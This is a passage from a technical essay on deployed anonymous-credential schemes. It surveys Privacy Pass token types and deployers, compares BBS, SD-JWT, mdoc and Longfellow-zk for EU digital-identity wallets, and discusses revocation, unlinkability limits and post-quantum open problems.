&lt;p&gt;The deployment picture partitions into three layers: hardware root, network layer, application layer. Each has shipped, each has a story, and the story differs sharply by layer.&lt;/p&gt;

flowchart TD
    subgraph L1[&quot;Hardware root: shipped on paper&quot;]
        Daa[&quot;TPM 2.0 ECDAA (optional in spec)&quot;]
    end
    subgraph L2[&quot;Network layer: ubiquitous&quot;]
        Apl[&quot;Apple Private Access Tokens&quot;]
        Cf[&quot;Cloudflare Privacy Pass&quot;]
        Ch[&quot;Chrome Private State Tokens&quot;]
        Edg[&quot;Microsoft Edge Privacy Pass&quot;]
        Apl --&amp;gt; RFCs[&quot;RFC 9576 / 9577 / 9578&quot;]
        Cf --&amp;gt; RFCs
        Ch --&amp;gt; RFCs
        Edg --&amp;gt; RFCs
    end
    subgraph L3[&quot;Application layer: four-way race&quot;]
        Bbs[&quot;BBS (draft-irtf-cfrg-bbs-signatures-10)&quot;]
        Sd[&quot;SD-JWT (RFC 9901)&quot;]
        Mdoc[&quot;mdoc (ISO/IEC 18013-5)&quot;]
        Lf[&quot;Longfellow-zk over ECDSA mdoc&quot;]
        Bbs --&amp;gt; Vcdm[&quot;W3C VC Data Model 2.0&quot;]
        Sd --&amp;gt; Vcdm
        Mdoc --&amp;gt; Vcdm
        Lf --&amp;gt; Vcdm
    end
&lt;h3&gt;Layer 1: The Hardware Root That Almost Was&lt;/h3&gt;
&lt;p&gt;ECDAA is the longest-standing &quot;shipped on paper, not in consumer hardware&quot; case in this story; §3 gives the full vendor-by-vendor diagnosis (Intel fTPM, AMD fTPM, Infineon, STMicroelectronics, Nuvoton). The hardware root is a layer in the diagram because the spec says so[@tpm-2-spec], not because anything depends on it day to day.&lt;/p&gt;
&lt;h3&gt;Layer 2: Privacy Pass, Ubiquitous&lt;/h3&gt;
&lt;p&gt;The network layer is where Privacy Pass actually lives at scale. RFC 9576 specifies the four-party architecture[@rfc9576]. RFC 9577 specifies the &lt;code&gt;PrivateToken&lt;/code&gt; HTTP authentication scheme that gives a browser a uniform way to receive a 401 challenge and present an unblinded token in response[@rfc9577]. RFC 9578 defines two interchangeable token types in a public registry: token type 0x0001 (VOPRF on P-384, RFC 9497 cryptography) and token type 0x0002 (Blind RSA on RFC 9474 cryptography)[@rfc9578][@rfc9497][@rfc9474].&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Privacy Pass token type&lt;/th&gt;
&lt;th&gt;Cryptography&lt;/th&gt;
&lt;th&gt;Publicly verifiable?&lt;/th&gt;
&lt;th&gt;Typical deployment&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;0x0001 (VOPRF)&lt;/td&gt;
&lt;td&gt;VOPRF on P-384 (RFC 9497)&lt;/td&gt;
&lt;td&gt;No -- verifier needs issuer secret&lt;/td&gt;
&lt;td&gt;Single-tenant: issuer == verifier (Cloudflare anti-abuse, Chrome Private State Tokens)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;0x0002 (Blind RSA)&lt;/td&gt;
&lt;td&gt;RSA-PSS with blinding (RFC 9474)&lt;/td&gt;
&lt;td&gt;Yes -- verifier needs only the issuer public key&lt;/td&gt;
&lt;td&gt;Federated: issuer != verifier (Apple Private Access Tokens)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The two-token-type design is the IETF&apos;s recognition that the deployment models are genuinely different.&lt;/p&gt;
&lt;p&gt;If the issuer and verifier are the same party -- say, Cloudflare issues a token to a client that solved its CAPTCHA, then verifies that token on a Cloudflare-fronted origin -- the VOPRF saves bytes on the wire (~96 bytes per token) and keeps the issuer secret unexposed. If issuer and verifier are separate -- say, a Cloudflare or Fastly issuer attests a device for an Apple-served website that has never seen the issuer secret -- the publicly-verifiable blind-RSA token is the right choice; any party with the issuer public key can verify.&lt;/p&gt;
&lt;p&gt;The deployers, with verified-source attribution:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Apple Private Access Tokens&lt;/strong&gt; shipped in iOS 16, iPadOS 16, and macOS Ventura, announced at WWDC 2022 and demonstrated by Tommy Pauly in session 10077, &lt;em&gt;Replace CAPTCHAs with Private Access Tokens&lt;/em&gt;. Cloudflare and Fastly are the launch issuers. The token type is 0x0002 (Blind-RSA), publicly verifiable[@apple-pat-news][@apple-wwdc-pat-2022].The Apple PAT WWDC22 session number is 10077. Session 10092 is &quot;Meet passkeys&quot; -- a different session by a different speaker. The two sessions are easy to confuse because both shipped in iOS 16; the Apple Developer News article that introduces PAT links directly to &lt;code&gt;wwdc2022/10077&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloudflare&lt;/strong&gt; ran the original 2017 browser-extension deployment, deprecated that v1 protocol in March 2024 (now Turnstile), and continues to operate RFC-compliant Privacy Pass issuers for the Apple PAT model[@cloudflare-2017-pp][@cloudflare-pp-docs][@cloudflare-2022-pat].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Google Chrome&lt;/strong&gt; ships &lt;em&gt;Private State Tokens&lt;/em&gt; -- the renamed successor to &lt;em&gt;Trust Tokens&lt;/em&gt; -- as the VOPRF token-type implementation, currently used for anti-fraud signalling[@google-private-state-tokens].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Edge&lt;/strong&gt; is named by Matthew Green&apos;s April 2026 primer (&quot;Privacy Pass is so ubiquitous that even Microsoft uses it in their Edge browser&quot;)[@green-2026-part2]. No primary Microsoft documentation for an &quot;Edge Private Access Tokens&quot; product name appears in public; the claim is reported with Green-attribution.&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Privacy Pass deployer&lt;/th&gt;
&lt;th&gt;Token type&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Apple (Private Access Tokens)&lt;/td&gt;
&lt;td&gt;0x0002 (Blind RSA)&lt;/td&gt;
&lt;td&gt;Origin and verifier; uses Cloudflare and Fastly as issuers&lt;/td&gt;
&lt;td&gt;Apple WWDC22 session 10077[@apple-wwdc-pat-2022]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloudflare&lt;/td&gt;
&lt;td&gt;0x0002 issuer for Apple PAT; runs Turnstile in parallel&lt;/td&gt;
&lt;td&gt;Issuer plus anti-abuse origin&lt;/td&gt;
&lt;td&gt;Cloudflare documentation[@cloudflare-pp-docs]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google Chrome (Private State Tokens)&lt;/td&gt;
&lt;td&gt;0x0001 (VOPRF)&lt;/td&gt;
&lt;td&gt;Anti-fraud signalling&lt;/td&gt;
&lt;td&gt;Google Privacy Sandbox[@google-private-state-tokens]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft Edge (Privacy Pass)&lt;/td&gt;
&lt;td&gt;Not published&lt;/td&gt;
&lt;td&gt;Per Green: &quot;uses it in their Edge browser&quot;&lt;/td&gt;
&lt;td&gt;Matthew Green, April 2026[@green-2026-part2]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Cloudflare&apos;s redemption throughput is the metric every press release wants. Green&apos;s April 2026 primer estimates &quot;hundreds of thousands of transactions per second&quot; across the broader Cloudflare anti-abuse surface, of which Privacy Pass is a fraction[@green-2026-part2]. No primary Cloudflare-side figure for tokens-per-second exists in public, so we report Green&apos;s estimate as Green&apos;s estimate and do not promote it to a Cloudflare-side fact.&lt;/p&gt;
&lt;h3&gt;Layer 3: The Multi-Attribute Four-Way Race&lt;/h3&gt;
&lt;p&gt;The application layer holds the four contenders the EU age-verification app&apos;s eventual design will pick among (and the parallel-path Hyperledger AnonCreds community). The envelope is the &lt;strong&gt;W3C Verifiable Credentials Data Model 2.0&lt;/strong&gt;, a Recommendation since 15 May 2025 that defines a credential format and supports multiple securing mechanisms[@w3c-vcdm-2]. The cryptography lives inside the envelope.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;BBS&lt;/strong&gt;, with &lt;code&gt;draft-irtf-cfrg-bbs-signatures-10&lt;/code&gt; dated 8 January 2026[@bbs-draft-10]. Pairing on BLS12-381. 80-byte signature, 256-byte proof. Multi-show unlinkable by construction. Best cryptographic privacy of the four; issuer adoption blocked on pairing-PKI migration.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SD-JWT&lt;/strong&gt; -- selective-disclosure JSON Web Tokens -- promoted to &lt;strong&gt;RFC 9901 (Standards Track) in November 2025&lt;/strong&gt; by Daniel Fett, Kristina Yasuda, and Brian Campbell[@rfc9901]. The mechanism is JSON Web Signatures plus salted hashes of individual claims, no zero-knowledge. Lowest deployment cost; the EUDI Wallet ARF&apos;s mandatory baseline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ISO/IEC 18013-5 mdoc baseline&lt;/strong&gt; -- published in 2021, deployed by US state DMVs in Arizona, Colorado, Georgia, Maryland and others, and the EUDI Wallet PID&apos;s mandatory co-baseline. CBOR-encoded mdoc plus ECDSA-signed mobile security object (MSO); same &quot;no ZK&quot; trade-off as SD-JWT[@iso-18013-5].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Longfellow-zk&lt;/strong&gt; -- ~1.2 s prover time, ~30 KB proof, open-sourced by Google under Apache-2.0 on 3 July 2025. Google partnered with Sparkasse for the German banking pilot[@google-2025-zkp-blog][@longfellow-repo][@longfellow-docs][@libzk-draft].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The EU age-verification app&lt;/strong&gt; -- &quot;technically ready&quot; 15 April 2026, with the technical portal at &lt;code&gt;ageverification.dev&lt;/code&gt; describing zero-knowledge proof cryptography as the unlinkability mechanism[@ec-2026-age-app][@ageverification-dev]. The wire format remains a public consultation question; Longfellow-zk over an mdoc is the strongest candidate among the four schemes above.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Hyperledger AnonCreds&lt;/strong&gt; -- the CL-RSA production stack used in self-sovereign-identity deployments (BC.GOV in Canada, the Ontario Digital Trust pilot)[@anoncreds-spec]. Parallel-path; not a contender for the EUDI Wallet slot, but actively shipping in the SSI community.&lt;/li&gt;
&lt;/ul&gt;

Regulation (EU) 2024/1183 -- the eIDAS 2 regulation that mandates the EUDI Wallet -- entered into force on 20 May 2024. The provisioning deadline for Member States to make at least one EUDI Wallet available is **24 December 2026**. Mandatory private-sector acceptance of an EUDI Wallet for relying parties subject to the regulation begins **6 December 2027**[@eidas2][@eu-cir-2024-2977]. Relying parties planning age-verification or attribute-disclosure deployments should treat these dates as binding regulatory deadlines, not as aspirational targets.
&lt;p&gt;Four schemes, four different optimisation targets, none of them strictly dominant. The choice depends on what you are willing to give up.&lt;/p&gt;
&lt;h2&gt;7. Choosing Among Four Multi-Attribute Schemes&lt;/h2&gt;
&lt;p&gt;There is no single best multi-attribute anonymous credential as of May 2026. There are four, each optimised for a different axis, and the EU&apos;s choice (mandate SD-JWT and mdoc; allow a ZKP overlay later) is the single most important deployment decision the field has made in a generation.&lt;/p&gt;
&lt;p&gt;The head-to-head comparison runs across seven dimensions that matter for any relying party choosing a scheme:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;BBS&lt;/th&gt;
&lt;th&gt;SD-JWT&lt;/th&gt;
&lt;th&gt;mdoc baseline&lt;/th&gt;
&lt;th&gt;Longfellow-zk&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Issuer cryptography&lt;/td&gt;
&lt;td&gt;Pairing on BLS12-381&lt;/td&gt;
&lt;td&gt;ECDSA-P-256 / EdDSA&lt;/td&gt;
&lt;td&gt;ECDSA-P-256 (COSE_Sign1)&lt;/td&gt;
&lt;td&gt;ECDSA-P-256 (unchanged from mdoc)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Holder cryptography&lt;/td&gt;
&lt;td&gt;Pairing-based ZK proof&lt;/td&gt;
&lt;td&gt;Hash + JWS verify&lt;/td&gt;
&lt;td&gt;Hash + ECDSA verify&lt;/td&gt;
&lt;td&gt;MPC-in-the-head SNARK + sumcheck&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Selective disclosure&lt;/td&gt;
&lt;td&gt;Native (any subset)&lt;/td&gt;
&lt;td&gt;Native (any disclosed claim)&lt;/td&gt;
&lt;td&gt;Native (any disclosed element)&lt;/td&gt;
&lt;td&gt;Native (any subset of mdoc elements)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-show unlinkability&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt; (each ProofGen is fresh)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;No&lt;/strong&gt; (JWS signature is a stable linker)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;No&lt;/strong&gt; (MSO signature is a stable linker)&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes&lt;/strong&gt; (each SNARK is fresh)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Native predicate proofs&lt;/td&gt;
&lt;td&gt;Yes (range proofs over committed messages -- draft in progress)&lt;/td&gt;
&lt;td&gt;No (issuer must pre-encode &lt;code&gt;age_over_18&lt;/code&gt; claim)&lt;/td&gt;
&lt;td&gt;No (issuer must pre-encode &lt;code&gt;age_over_18&lt;/code&gt; element)&lt;/td&gt;
&lt;td&gt;Yes (predicate enforced inside SNARK circuit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-presentation size&lt;/td&gt;
&lt;td&gt;~256 B (BBS proof)&lt;/td&gt;
&lt;td&gt;~KB-scale&lt;/td&gt;
&lt;td&gt;~KB-scale (full mdoc)&lt;/td&gt;
&lt;td&gt;~30 KB (SNARK proof)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-presentation prover wall-clock&lt;/td&gt;
&lt;td&gt;~30 ms&lt;/td&gt;
&lt;td&gt;~1 ms&lt;/td&gt;
&lt;td&gt;~1 ms (ECDSA verify on disclosure)&lt;/td&gt;
&lt;td&gt;~1.2 s on mobile (per Google blog)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Issuer-side adoption cost&lt;/td&gt;
&lt;td&gt;High (new BLS12-381 PKI; not in any DMV or national ID today)&lt;/td&gt;
&lt;td&gt;Low (stock JWS / OIDC stack)&lt;/td&gt;
&lt;td&gt;Low (stock ECDSA + COSE)&lt;/td&gt;
&lt;td&gt;Zero (reuses existing mdoc issuance)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Standards maturity&lt;/td&gt;
&lt;td&gt;IETF CFRG Draft 10 (Jan 2026); not yet RFC&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;RFC 9901 (Standards Track, Nov 2025)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;ISO/IEC 18013-5:2021 published&lt;/td&gt;
&lt;td&gt;IETF CFRG individual draft (libzk); proof system named; credential profile not yet standardised&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EUDI Wallet ARF status&lt;/td&gt;
&lt;td&gt;Optional / future&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Mandatory baseline&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Mandatory co-baseline (PID)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Targeted backend for age verification&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Quantum resistance&lt;/td&gt;
&lt;td&gt;No (pairing DLP broken by Shor)&lt;/td&gt;
&lt;td&gt;No (ECDSA broken by Shor)&lt;/td&gt;
&lt;td&gt;No (ECDSA broken by Shor)&lt;/td&gt;
&lt;td&gt;Conditional: SHA-256 circuit is Grover-only but the issuer ECDSA is still Shor-broken&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Read the table top to bottom and a single tension dominates: cryptographic privacy versus issuer adoption cost.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Best cryptographic privacy: BBS.&lt;/strong&gt; A BBS presentation is a single fresh 256-byte proof per show, structurally unlinkable across presentations, supports any selective disclosure subset, and the in-progress range-proof extension will support predicate proofs natively. The price is that every issuer has to operate a pairing-friendly PKI on BLS12-381, which no national-identity authority does today.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lowest deployment cost: SD-JWT or mdoc baseline.&lt;/strong&gt; Stock ECDSA, stock JWS or COSE_Sign1, drop-in to any existing OAuth or COSE pipeline. The price is that every presentation reveals the issuer&apos;s deterministic signature on the credential, which is a stable identifier across presentations -- so SD-JWT and mdoc baseline have selective disclosure but not multi-show unlinkability. Two presentations of the same SD-JWT VC to colluding verifiers are trivially linkable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cryptographic privacy without issuer migration: Longfellow-zk.&lt;/strong&gt; The trick is to wrap the existing ECDSA-signed mdoc in a SNARK that proves &quot;I know an ECDSA signature on a credential whose disclosed elements satisfy the predicate.&quot; The issuer changes nothing. The price is 30 KB of proof on the wire and 1.2 seconds of prover time on a 2024-era mobile phone, both two orders of magnitude above what BBS achieves.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; There is no single best multi-attribute anonymous credential as of May 2026. The choice is between cryptographic privacy (BBS), deployment cost (SD-JWT or mdoc), or no issuer migration (Longfellow-zk) -- and the EU has decided the third axis matters most.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The political dynamic behind the EUDI Wallet ARF is worth naming. Version 1.4 of the architecture document mandates SD-JWT VC and mdoc as the credential format baselines -- privacy-suboptimal but deployable in 2026 -- and lists BBS as &quot;optional, future&quot;[@eudi-arf]. Google&apos;s open-sourcing of Longfellow-zk on 3 July 2025 was the strategic move to ensure a zero-knowledge overlay was shipping in a real library before SD-JWT entrenched as the only credential format anyone actually implemented[@google-2025-zkp-blog]. The German banking pilot with Sparkasse is the first test of that strategy at issuer scale. The EU age-verification app is the first test at population scale.&lt;/p&gt;

The cryptography community had spent two decades trying to build a one-credential-for-everything scheme. Privacy Pass shipped because it gave up that ambition and signed one bit. Longfellow ships because it gives up cryptographic minimality so the issuer never moves.
&lt;p&gt;Every shipping scheme is correct cryptography for the constraints it was given. Each scheme makes a different concession -- to deployment, to throughput, to standardisation -- and the concessions reveal what the field still cannot do.&lt;/p&gt;
&lt;h2&gt;8. What the Cryptography Cannot Do&lt;/h2&gt;
&lt;p&gt;Three things the cryptography genuinely cannot do, and one we do not know how to do efficiently.&lt;/p&gt;
&lt;h3&gt;Revocation Under Unlinkability Is Structurally Impossible Without State&lt;/h3&gt;
&lt;p&gt;Revoking a specific credential -- the holder&apos;s wallet was stolen, the holder&apos;s status changed, the credential expired -- means a verifier must be able to recognise &quot;this credential has been revoked.&quot; Recognising a specific credential means keeping some state that maps it to its revocation status. Multi-show unlinkability means no two presentations of the same credential should be linkable. The two requirements are in direct tension.&lt;/p&gt;
&lt;p&gt;The literature has produced three escape hatches, each trading privacy or scale for revocation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Accumulator-based revocation&lt;/strong&gt; -- the BBS+ approach -- stores all valid credentials in a cryptographic accumulator and gives each holder a witness of membership; revocation updates the accumulator and the holder must update their witness, which scales badly at nation-state membership counts. &lt;strong&gt;Epoch-based credential rotation&lt;/strong&gt; -- the Hyperledger AnonCreds approach -- has each credential expire at a fixed epoch (a week, a month) and re-issues; the cost is bandwidth and online-issuer dependence. &lt;strong&gt;Verifier-local linkability with revocation tokens&lt;/strong&gt; -- the EPID approach -- gives each verifier a pseudonym derived from the credential plus a verifier-specific tag, sacrificing unlinkability across that verifier in exchange for revocation-list checking[@daa-2004-doi].&lt;/p&gt;
&lt;p&gt;The deployed status-list approaches (used by SD-JWT VC and mdoc baseline today) take an even simpler route: assign each credential an index into a published bitmap. The verifier downloads the bitmap and checks the bit. The trade is brutal: the credential&apos;s index &lt;em&gt;is&lt;/em&gt; a stable identifier across presentations, so status lists give revocation by giving up unlinkability[@oauth-status-list-draft].The Token Status List specification is the IETF draft &lt;code&gt;draft-ietf-oauth-status-list-20&lt;/code&gt; (April 2026, intended Standards Track but not yet an RFC), by Looker, Bastian, and Bormann. An older summary of this stack sometimes cited it as &quot;RFC 9863&quot;; that is a different document about a PCEP Color extension and is unrelated. The Token Status List is still a draft.&lt;/p&gt;
&lt;h3&gt;Selective Disclosure Without ZK and With Multi-Show Unlinkability Is Impossible&lt;/h3&gt;
&lt;p&gt;If the issuer signs the credential with a deterministic signature -- any standard JWS, COSE_Sign1, or mdoc MSO -- the signature itself is a stable bit-string. Two presentations of the same credential expose the same signature, and colluding verifiers can link them by comparing signatures alone.&lt;/p&gt;
&lt;p&gt;The only way to break that link is to randomise the signature per presentation, which mathematically requires a zero-knowledge proof: instead of revealing the signature, the holder proves they know one. SD-JWT and the mdoc baseline are explicit about being on the &quot;no ZK, presentations linkable&quot; side of the dichotomy; BBS and Longfellow-zk are explicit about being on the ZK-required side[@rfc9901][@iso-18013-5]. You can have selective disclosure without ZK, or selective disclosure with multi-show unlinkability via ZK, but you cannot have selective disclosure with multi-show unlinkability and without ZK.&lt;/p&gt;
&lt;h3&gt;Holder Unlinkability Under Issuer-Verifier Collusion Is Structurally Limited&lt;/h3&gt;
&lt;p&gt;If issuer and verifier share state -- a per-credential nonce, a serial number burned into the credential at issuance -- unlinkability against a colluding pair is broken. Privacy Pass mitigates this with the four-party Attester-Issuer-Origin split in RFC 9576, where the issuer learns nothing about the user&apos;s attestation and the origin learns nothing about the issuance event[@rfc9576]. BBS relies on the pairing-based discrete-log assumption and the random-oracle model to ensure that issuer and verifier together cannot link presentations without breaking pairing crypto. Both mitigations work, but both require operational separation between the parties; collapse them into a single trust domain and the unlinkability guarantee weakens.&lt;/p&gt;
&lt;h3&gt;Post-Quantum Migration Is Unsolved for Credentials&lt;/h3&gt;
&lt;p&gt;Every deployed scheme at every layer breaks against a cryptographically relevant quantum computer.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;BBS depends on pairings on BLS12-381; Shor&apos;s algorithm breaks the underlying discrete-log problem.&lt;/li&gt;
&lt;li&gt;ECDSA in SD-JWT, mdoc baseline, and Longfellow-zk&apos;s issuer signature: broken by Shor.&lt;/li&gt;
&lt;li&gt;RSA in blind-RSA Privacy Pass: broken by Shor.&lt;/li&gt;
&lt;li&gt;TPM 2.0 ECDAA: broken by Shor.&lt;/li&gt;
&lt;li&gt;SHA-256 inside Longfellow-zk&apos;s MPC-in-the-head circuit: Grover-only, which halves the effective security level but does not break the construction outright. The issuer&apos;s ECDSA signature inside the SNARK, however, is still Shor-broken.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Lattice-based anonymous-credential constructions exist in the research literature -- the headline blind-signature primitive is &lt;strong&gt;BLOOM&lt;/strong&gt; (Lyubashevsky and Nguyen, IACR ePrint 2022/1307, ASIACRYPT 2022[@bloom-eprint][@bloom-dblp]), and the headline 2023 anonymous-credentials framework built on top is &lt;strong&gt;BLNS&lt;/strong&gt; (Bootle-Lyubashevsky-Nguyen-Sorniotti, ePrint 2023/560[@blns-eprint]). BLNS reports proofs &quot;as small as a few dozen kilobytes&quot; for arbitrarily large user populations[@blns-eprint] -- none are deployed, none are within an order of magnitude of BBS&apos;s eighty-byte signature, and none are inside &lt;a href=&quot;https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/&quot; rel=&quot;noopener&quot;&gt;NIST&apos;s post-quantum standardisation rounds&lt;/a&gt;. Credentials issued in 2026 with multi-decade validity (a national ID expected to be honoured through 2046, say) face the structural risk that they may be forgeable by a quantum adversary inside their nominal lifetime.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A cryptographically relevant quantum computer breaks every currently deployed scheme in Layers 1, 2, and 3 of this stack. CRQC timelines are uncertain. Credentials issued in 2026 with multi-decade validity periods need a post-quantum migration plan that does not yet exist for anonymous credentials, and that gap is the most consequential open problem in the field.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Revocation under anonymity, multi-show unlinkability without ZK, and post-quantum credentials are not engineering problems waiting on better libraries. They are structural impossibilities or open research questions that require the field to either change assumptions or accept new primitives. The next decade is not &quot;ship better libraries&quot;; it is either &quot;invent new primitives&quot; or &quot;accept that 2046 will see forgeable credentials issued in 2026.&quot;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The framing the field tends to avoid is sharper than &quot;this scheme is small.&quot; Two formal results pin where each construction sits. Pointcheval and Stern&apos;s &lt;em&gt;Journal of Cryptology&lt;/em&gt; 2000 paper -- the canonical security proof for blind signatures under the one-more-unforgeability game in the random-oracle model -- gives a reduction whose loss factor scales as the number of random-oracle queries $q_h$ the adversary makes; asymptotically this forces signature size to be $\Omega(\lambda)$ bits at security parameter $\lambda$, or about 16 bytes at $\lambda = 128$[@pointcheval-stern-2000-joc]. Bitansky, Canetti, Chiesa, and Tromer&apos;s ITCS 2012 paper on extractable SNARKs (&quot;...and back again&quot;) proves that any extractable succinct argument of knowledge cannot be shorter than $\Omega(\lambda)$ bits either[@bcct-2012-itcs][@bcct-dblp]. BBS at 80 bytes is therefore within a small constant factor of the SNARK-class floor; that is not &quot;the&quot; information-theoretic minimum, but it sits in the right asymptotic neighbourhood.&lt;/p&gt;
&lt;p&gt;Applying the Pointcheval-Stern[@pointcheval-stern-2000-joc] and BCCT[@bcct-2012-itcs][@bcct-dblp] $\Omega(\lambda)$ bounds from the preceding paragraph to the Longfellow numbers from §5: Longfellow&apos;s ~30 KB proof is roughly $3$ to $4\times$ above the construction-class floor $O(\sqrt{|C|}\cdot\lambda)$ for MPC-in-the-head plus sumcheck on an ECDSA-verification circuit of a few thousand gates[@ligero-2017-dblp][@ligero-doi]. Against the Groth16-class floor of ~128 bytes that a trusted-setup-permitted SNARK reaches[@bcct-2012-itcs], Longfellow is roughly $200$ to $300\times$ larger. That gap is the cost of avoiding trusted setup, not a cryptographic shortcoming.&lt;/p&gt;
&lt;h2&gt;9. Open Problems&lt;/h2&gt;
&lt;p&gt;Five problems the field knows it has and cannot yet solve at the scale shipping demands. For each, the question is not just &quot;what is missing?&quot; but &quot;what is the structural obstacle that the engineering has been bumping into?&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Practical revocation under anonymity at nation-state scale.&lt;/strong&gt; The EUDI Wallet rollout will need revocation across roughly 450 million wallets and tens of thousands of relying parties, preserving multi-show unlinkability.&lt;/p&gt;
&lt;p&gt;The canonical academic answer is the Camenisch-Kohlweiss-Soriente accumulator-based revocation scheme from PKC 2009 -- a dynamic accumulator on bilinear maps with efficient witness updates[@cks-2009-edinburgh][@cks-2009-dblp]. Cryptographically, the accumulator value $V \in G_1$ is a single BLS12-381 group element (48 bytes compressed) that commits to the set of currently-valid credential identifiers. Each holder carries a witness $W_i \in G_1$ of membership (48 more bytes). When the issuer revokes credential $j$, every non-revoked holder must update their witness using a per-revocation broadcast update value $U_j$ (48 bytes per revocation) and one scalar multiplication in $G_1$. CKS prove that the update is correct without re-issuance and can be delegated to untrusted helpers, which is the property that makes the scheme attractive in the first place[@cks-2009-edinburgh].&lt;/p&gt;
&lt;p&gt;Plug nation-state numbers into that arithmetic and the scaling shows up. Assume 10,000 revocations per day across a 50M-wallet population (a single mid-sized member state). Every non-revoked holder must download $10{,}000 \times 48 = 480$ KB per day of update values and perform 10,000 scalar multiplications on BLS12-381 -- on the order of ten seconds of mobile CPU per day.&lt;/p&gt;
&lt;p&gt;Batching the updates helps, but it does not change the asymptotics: the per-holder cost is linear in the number of revocations in the relevant time window. At full-EU scale (450M wallets, the same revocation rate per capita), the per-holder bandwidth stays the same; the &lt;em&gt;issuer-side&lt;/em&gt; aggregation cost grows linearly.&lt;/p&gt;
&lt;p&gt;Status-list revocation -- the Token Status List approach that SD-JWT VC and the mdoc baseline currently use[@oauth-status-list-draft] -- gets around the bandwidth problem by giving each credential an index into a published bitmap. But the index &lt;em&gt;is&lt;/em&gt; a stable identifier across presentations, so the trade is brutal: revocation by giving up unlinkability. No deployed solution today gives both unlinkability and sublinear-per-holder revocation at nation-state scale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Post-quantum BBS and post-quantum Privacy Pass.&lt;/strong&gt; Lattice-based attempts are multi-kilobyte at best and an active research area; pairing-based schemes remain at ~80-byte signatures.&lt;/p&gt;
&lt;p&gt;The structural obstacle is the geometry of lattice commitments. The BLNS framework (Bootle-Lyubashevsky-Nguyen-Sorniotti, 2023[@blns-eprint]) reports proofs &quot;as small as a few dozen kilobytes&quot; for arbitrarily-large user populations -- concretely on the order of 20-40 KB per credential and 30-50 KB per show.&lt;/p&gt;
